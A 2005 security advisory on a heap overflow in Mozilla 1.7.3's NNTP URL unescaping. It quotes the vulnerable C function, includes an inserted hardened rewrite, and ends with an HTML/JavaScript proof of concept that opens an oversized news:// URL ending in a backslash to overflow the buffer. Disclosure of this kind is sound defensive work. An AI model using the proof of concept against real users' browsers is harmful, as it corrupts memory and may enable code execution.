[UNIX] Mozilla Browser NNTP Heap Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 01/02/05

    To: list@securiteam.com
    Date: 2 Jan 2005 17:06:08 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Mozilla Browser NNTP Heap Overflow
    ------------------------------------------------------------------------

    SUMMARY

    A critical security vulnerability has been found in the Mozilla Project
    code that handles the NNTP protocol.

    DETAILS

    Vulnerable Systems:
     * Mozilla Browser version 1.7.3 and prior with mozilla-mail

    Immune Systems:
     * Mozilla Browser version 1.7.5 or newer

    The Mozilla browser supports NNTP URLs, so a remote page is able to
    trigger a news:// connection to any server. Maurycy found a flaw in the
    NNTP handling code which may cause a heap overflow and allow a remote
    attacker to execute arbitrary code on the client machine.

    Buggy function from nsNNTPProtocol.cpp:

    char *MSG_UnEscapeSearchUrl (const char *commandSpecificData)
    {
      /* Output buffer is sized to the input: at most one byte is written
         per input byte, so the size itself is not the problem. */
      char *result = (char*) PR_Malloc (PL_strlen(commandSpecificData) + 1);
      if (result)
      {
        char *resultPtr = result;
        while (1)
        {
          char ch = *commandSpecificData++;
          if (!ch)
            break;
          if (ch == '\\')
          {
            /* The next two bytes are consumed without checking for the
               terminating NUL. If the backslash is the last character,
               the reader steps past the end of the source string and the
               loop never sees the terminator. */
            char scratchBuf[3];
            scratchBuf[0] = (char) *commandSpecificData++;
            scratchBuf[1] = (char) *commandSpecificData++;
            scratchBuf[2] = '\0';
            int accum = 0;
            PR_sscanf(scratchBuf, "%X", &accum);
            *resultPtr++ = (char) accum;
          }
          else
            *resultPtr++ = ch;
        }
        *resultPtr = '\0';
      }
      return result;
    }

    When commandSpecificData points to the last character of the string (the
    next byte is the NUL terminator) and that character is '\\', the copying
    loop skips over the terminator of the source array, keeps reading whatever
    follows it in memory, and overflows the result buffer.
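    As an added example (not code from the advisory, and not Mozilla's actual 1.7.5 fix), here is a hardened version of the same unescape loop written against the C standard library instead of NSPR's PR_Malloc/PR_sscanf; the function and helper names are my own. A backslash is treated as an escape only when two hex digits actually follow it, so the reader can never advance past the NUL and the one-byte-per-input-byte bound on the output holds.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Decode one hex digit, or return -1 if c is not a hex digit. */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Hardened variant (constructed for this example, not Mozilla's code).
 * Each "\HH" escape consumes three input bytes and emits one; every
 * other input byte, including a lone or trailing backslash, is copied
 * literally. The output therefore never exceeds strlen(in), and the
 * short-circuit checks stop reading at the first NUL. Returns a
 * malloc'd string the caller frees, or NULL on allocation failure. */
char *unescape_search_url_safe(const char *in)
{
    size_t len = strlen(in);
    char *out = malloc(len + 1);
    if (!out) return NULL;
    char *p = out;
    while (*in) {
        int hi, lo;
        /* in[2] is only read when in[1] is a hex digit, hence non-NUL */
        if (*in == '\\' && (hi = hexval((unsigned char)in[1])) >= 0
                        && (lo = hexval((unsigned char)in[2])) >= 0) {
            *p++ = (char)(hi * 16 + lo);
            in += 3;
        } else {
            *p++ = *in++;
        }
    }
    *p = '\0';
    return out;
}

int main(void)
{
    /* Constructed input: the trailing backslash is the advisory's trigger */
    char *s = unescape_search_url_safe("profile/\\41\\");
    printf("%s\n", s ? s : "(alloc failed)");
    free(s);
    return 0;
}
```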

    Solution:
    This bug is fixed in Mozilla 1.7.5 (Bug 264388). Mozilla developer Dan
    Veditz claims that it is not exploitable: "A '\' on the end will
    certainly trash memory, but at that point you're no longer reading
    attacker-supplied data;".

    On my RedHat 9.0 with Mozilla 1.7.3, the attached proof of concept code
    overflows the buffer using attacker-supplied data. I decided to make this
    bug public because the Mozilla Team hasn't warned users.

    Proof of concept:

    <html>
    <script>
    i = "news://news.individual.net/AAAAAAAAAAAAAA?";
    for(l = 0; l < 16376; l++)
      i=i+"A";
    i=i+"/?profile/";
    for(l = 0; l < 16384; l++)
      i=i+"A";
    i=i+"\\";
    window.open(i);
    </script>
    </html>

    ADDITIONAL INFORMATION

    The information has been provided by Maurycy Prodeus (z33d@isec.pl).
    The original article can be found at:
    http://isec.pl/vulnerabilities/isec-0020-mozilla.txt


